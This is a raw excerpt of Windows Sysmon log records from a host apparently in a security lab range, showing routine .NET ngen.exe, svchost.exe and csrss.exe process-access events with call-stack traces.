13:23:59.581{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-2903-000000009A01}2620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007266Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.565{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-2803-000000009A01}4984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007265Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.549{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-2803-000000009A01}4984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007264Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.549{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-2803-000000009A01}4984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007263Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.534{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-2703-000000009A01}4256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007262Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.534{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-2703-000000009A01}4256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007261Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.534{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-2703-000000009A01}4256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007260Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.518{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-2603-000000009A01}1952C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007259Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.503{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-2603-000000009A01}1952C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007258Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.503{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-2603-000000009A01}1952C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007257Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.487{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-2503-000000009A01}5072C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007256Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.471{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-2503-000000009A01}5072C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007255Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.471{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-2503-000000009A01}5072C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007254Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.456{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-2403-000000009A01}4748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007253Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.456{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-2403-000000009A01}4748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007252Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.456{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-2403-000000009A01}4748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007251Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.440{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-2303-000000009A01}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007250Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.424{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-2303-000000009A01}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007249Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.424{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-2303-000000009A01}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007248Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.409{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-2203-000000009A01}3324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007247Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.409{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-2203-000000009A01}3324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007246Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.409{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-2203-000000009A01}3324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\S